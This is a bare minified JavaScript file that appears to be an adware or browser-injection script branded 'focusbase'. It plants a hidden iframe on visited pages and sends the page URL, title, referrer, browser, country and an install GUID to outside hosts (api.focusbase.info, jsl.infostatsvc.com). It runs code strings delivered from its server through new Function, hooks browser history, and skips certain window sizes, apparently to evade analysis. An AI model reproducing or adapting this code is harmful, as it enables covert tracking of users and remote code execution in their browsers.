(function(){function z(b,a,c){if(b instanceof Array){if("undefined"!=typeof Array.prototype.indexOf)return b.indexOf(a,c);c=c||0;var d=b.length;if(c>=d)return-1;for(0>c&&(c=Math.max(d+c,0));c<d;c++)if(b[c]===a)return c}return-1}function H(){for(var b=0;b<I.length;b++){var a=I[b].exec(navigator.userAgent);if(a)return b=a.splice(1,2),2>b.length&&b.push("0"),b}return["Unknown","0"]}function Q(b){var a={rawName:"Unknown",rawVersion:"0",name:"Unknown",version:"0"};if(!1==!!b||2>b.length)return a;a.name=
a.rawName=b[0];a.version=a.rawVersion=b[1];b=a.version.indexOf(".");-1!==b&&(a.version=a.version.substring(0,b));b=a.rawName.toLowerCase();switch(b){case "mrchrome":a.name="Amigo";break;case "opr":a.name="Opera";break;case "yabrowser":a.name="Yandex";break;case "ir":a.name="Rocket"}0==b.indexOf("msie")?a.name="MSIE":0==b.indexOf("trident")&&(a.name="MSIE",a.version="11");return a}function s(b,a){if(b.constructor){var c=b.constructor.prototype[a],d=typeof c;if("function"==d||l&&9>l&&"object"==d)return function(){return c.apply(b,
arguments)}}if(l&&8>l&&b===f)try{return eval(R.join(a))}catch(g){}return b[a]}function p(b,a){var c=h.createElement("script");c.type="text/javascript";c.src=b;c.onload=c.onreadystatechange=function(){if(!this.readyState||"loaded"==this.readyState||"complete"==this.readyState){c.onload=c.onreadystatechange=null;c.parentNode.removeChild(c);try{"function"==typeof a&&a()}catch(b){}}};(h.body||h.head).appendChild(c)}function S(b,a,c){var d=m+1E20*Math.random();f[d]=c;p(b+(0<b.indexOf("?")?"&":"?")+a+"="+
d,function(){try{delete f[d]}catch(a){}})}function A(b,a){for(var c={},d=b.search.substr(1).split("&"),g=0;g<d.length;g++){var e=d[g].split("=");c[decodeURIComponent(e[0])]=2==e.length?decodeURIComponent(e[1]):""}return c[a]}function u(b){for(var a=[],c=0;c<b.length;c++)a.push(encodeURIComponent(b[c].toString().replace(/,/g,"$cma;")));h.images&&((new Image).src=T+a.shift()+"="+a.join("|,|"))}function U(b){var a;window.history&&(a=window.history,C=a.pushState,a.pushState=function(c){"function"==typeof a.a&&
a.a({state:c});b();return C.apply(a,arguments)})}function v(b,a,c){if(b.addEventListener)return b.addEventListener(a,c,!1);if(b.attachEvent)return b.attachEvent("on"+a,c)}function q(b,a,c){if(b.removeEventListener)return b.removeEventListener(a,c,!1);if(b.detachEvent)return b.detachEvent("on"+a,c)}function V(b){if("function"==typeof J)return J(b);for(var a,c=0,d=w,g="";b.charAt(c|0)||(d="=",c%1);g+=d.charAt(63&a>>8-c%1*8))a=a<<8|b.charCodeAt(c-=-.75);return g}function W(b){for(var a=0,c="";a<b.length;)var d=
parseInt(b.charAt(a++),16)<<8|parseInt(b.charAt(a++),16)<<4|parseInt(b.charAt(a++),16),g=d&63,c=c+w.charAt(d>>6),c=c+w.charAt(g);for(;c.length%4;)c+=w.charAt(64);return c}function X(b){function a(a,d){try{x[b]=d?a+"-"+d:a}catch(g){}}return{abort:function(c){a("abort",c)},exception:function(c){a("exception",c)},success:function(c){a("success",c)}}}function Y(b,a,c,d){var g=X(d);return function(){try{(new Function("client","defaultSettings","customSettings","report",c))(e,b,a,g)}catch(d){g.exception(d)}}}
function K(b){for(var a=0;a<b.length;a++){var c=b[a];L(Y(c.defaultSettings,c.customSettings,c.init,c.id),0)}}function D(){q(f,"unload",D);var b;window.history&&(b=window.history,b.pushState=C);if(!(.1<Math.random())){b=[];for(var a in x)x.hasOwnProperty(a)&&b.push(a+":"+x[a]);a=e.geo&&"string"==typeof e.geo.countryCode?e.geo.countryCode.toLowerCase():"";b=["InitState",e.guid,h.location.host,h.location.href].concat(H(),a,e.urlCategories?e.urlCategories.join("|"):"",b.join("|"),(new Date).getTime());
u(b)}}function M(){for(var b=m,a=!1,c=h.getElementsByTagName("script"),d=0;d<c.length;d++)if(-1<c[d].src.indexOf(Z+"/gsrs")){var g=h.createElement("a");g.href=c[d].src;e.guid=A(g,"g");e.installSource=A(g,"is");r=A(g,"bp");if(k=h.getElementById(b)){if(g=k.getAttribute("t"),-1==g.split("|").indexOf(r)){k.setAttribute("t",g+"|"+r);a=!0;break}}else{a=!0;break}}a&&u(["Runtime_Ran",m,e.guid||"00000000-0000-0000-0000-000000000000",r.substr(0,1E3),e.browser.name.substr(0,1E3),e.browser.version.substr(0,1E3)]);
if(k)q(f,"message",N);else{a:for(d=h.title||"",a=0;a<O.length;a++)if(O[a].test(d)){d="";break a}a=d.substr(0,1E3);c=[[790,482,0,0],[1024,704,0,0],[1024,697,-8,-8],[1024,706,0,0],[1024,670,0,0],[790,446,0,0],[1024,707,0,0],[1024,669,0,0],[790,518,0,0],[1024,670,0,0],[1024,671,0,0],[1024,632,0,0],[1024,633,0,0],[752,478,4,4],[1024,668,0,0],[1024,666,0,0],[1024,702,0,0]];d=0;for(g=c.length;d<g;d++)if(f.innerWidth==c[d][0]&&f.innerHeight==c[d][1]&&f.screenX==c[d][2]&&f.screenY==c[d][3])return u(["SkippedRender_1",
e.guid||"",m,a,f.location.href.substr(0,4E3),"Platform"]);k=h.createElement("iframe");k.id=b;k.style.width="1px";k.style.height="1px";k.style.display="none";k.src="https:"+E+"/gscf?n="+encodeURIComponent((f.name||"").substr(0,1E3))+"&t="+encodeURIComponent(a)+"&r="+encodeURIComponent((h.referrer||"").substr(0,4E3))+"&g="+encodeURIComponent(e.guid||"")+"&is="+encodeURIComponent(e.installSource||"")+"&bp="+encodeURIComponent(r||"BF");k.setAttribute("t",r);h.body.appendChild(k)}}function N(b){try{var a=
b.data;"string"==typeof a&&(a=n.parse(a));if(a.ext&&a.ext==m){if(k&&b.source==k.contentWindow)if("userdata"==a.msg&&a.installSource&&a.appData){e.installSource=a.installSource;e.ip=a.ip;e.geo=a.geo;e.bid=a.bucketId;e.token=a.token;F=a.appData;for(var c=0;c<F.length;c++){var d=F[c];d.id==$&&(e.tc=!0);(d.blacklistCategories.length||d.whitelistCategories.length||!d.skipUrlCategorization?y:G).push(d)}G.length&&K(G);y.length&&(c={ext:m,msg:"getcategory"},k.contentWindow.postMessage(!l||9<l?c:n.stringify(c),
"*"));v(f,"unload",D);U(D)}else if("category"==a.msg&&a.categoryData){e.urlCategories=a.categoryData.categories;e.isBadCategory=a.categoryData.isBadCategory;e.isBadUrl=a.categoryData.isBadUrl;e.isBadUrlCategory=e.isBadCategory||e.isBadUrl;for(var c=a.categoryData.categories,d=[],g=0;g<y.length;g++){var B=y[g],h;a:{for(var r=c,p=B.blacklistCategories,q=B.whitelistCategories,t=0;t<q.length;t++)if(-1<z(r,q[t])){h=!0;break a}for(t=0;t<p.length;t++)if(-1<z(r,p[t])){h=!1;break a}h=!q.length||!!p.length}h&&
d.push(B)}d.length&&K(d)}if(b.source==f)if("getguid"==a.msg){var s={ext:m,msg:"guid",guid:e.guid,bf:!0};P(!l||9<l?s:n.stringify(s),"*")}else"statechange"==a.msg&&"number"==typeof a.appid&&"boolean"==typeof a.state&&k.contentWindow.postMessage(!l||9<l?a:n.stringify(a),"https:"+E)}}catch(u){}}var f=window,k,h=document,n,l=!1,m="focusbase",E="//api.focusbase.info",Z="//apifocusbaseinfo-a.akamaihd.net",F,r,T="//jsl.infostatsvc.com/?",w="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
R=["(function () {delete ","; return ",";})()"],C,I=[/\b(IR)\/([\d\.]+)\b/i,/\b(opr)\/([\d\.]+)\b/i,/\b(lunascape)[\/ ]([\d\.]+)\b/i,/\b(maxthon)\/([\d\.]+)\b/i,/\b(yabrowser)\/([\d\.]+)\b/i,/\b(mrchrome)\b/i,/\b(chrome)\/([\d\.]+)\b/i,/\b(msie)\s([\d\.]+)\b/i,/\b(trident)\/([\d\.]+)\b/i,/\b(firefox)\/([\d\.]+)\b/i,/\b(safari)\/([\d\.]+)\b/i,/\b(opera)\/([\d\.]+)\b/i],$="1065";if(f.top==f){var y=[],G=[],x={},O=[/\b(?:\d[(). -]*?){9,16}\b/,/\b[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*@(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\b/i],
L=s(f,"setTimeout"),J=s(f,"btoa"),P=s(f,"postMessage"),e=function(){function b(){q(h,"DOMContentLoaded",b);for(q(f,"load",b);a.length;)L(a.pop(),0)}var a=[],c={},d=H();return{productName:m,webDomain:"focusbase.info",webCdnDomain:"wwwfocusbaseinfo-a.akamaihd.net",es:"2",tc:!1,browser:Q(d),utils:{addEventListener:v,arrayIndexOf:z,changeAppState:function(a,c){if("number"==typeof a&&"boolean"==typeof c){var b={ext:m,msg:"statechange",appid:a,state:c};P(!l||9<
l?b:n.stringify(b),"*")}},removeEventListener:q,base64EncodeText:V,base64EncodeHex:W,getNativeWindowFunction:s,loadScript:p,loadJSONP:S,log:u,ready:function(c){a.push(c);"complete"==h.readyState?b():(v(h,"DOMContentLoaded",b),v(f,"load",b))},require:function(a,b,d){switch(a){case "jquery":b=b||"1";c[a]&&c[a][b]?"function"==typeof d&&d(c[a][b]):p("//ajax.googleapis.com/ajax/libs/jquery/"+b+"/jquery.min.js",function(){c[a]=c[a]||{};c[a][b]=f.jQuery.noConflict(!0);"function"==typeof d&&d(c[a][b])});
break;case "swfobject":if(b=b||"2",c[a]&&c[a][b])"function"==typeof d&&d(c[a][b]);else{var e=f.swfobject;p("//ajax.googleapis.com/ajax/libs/swfobject/"+b+"/swfobject.js",function(){c[a]=c[a]||{};c[a][b]=f.swfobject;f.swfObject=e;"function"==typeof d&&d(c[a][b])})}}},setBucketId:function(a,b){if(b instanceof Date){var c={ext:m,msg:"setbucket",bid:a,exp:b.valueOf()};k.contentWindow.postMessage(!l||9<l?c:n.stringify(c),"https:"+E)}}},window:{name:f.name},getInstallId:function(){return this.guid},getClientIP:function(){return this.ip}}}();
(function(){var b=h.documentMode,a;try{delete h.documentMode,a=h.documentMode,h.documentMode=b}catch(c){}"number"==typeof a?l=a:"number"==typeof b&&(l=b);v(f,"message",N);var d=f.JSON;"object"==typeof d&&"function"==typeof d.stringify&&"function"==typeof d.parse?(n=d,e.utils.JSON=n,e.utils.ready(M)):p("//cdnjs.cloudflare.com/ajax/libs/json3/3.2.4/json3.min.js",function(){n=f.JSON;e.utils.JSON=n;"undefined"!=typeof d&&(f.JSON=d);e.utils.ready(M)})})()}})();
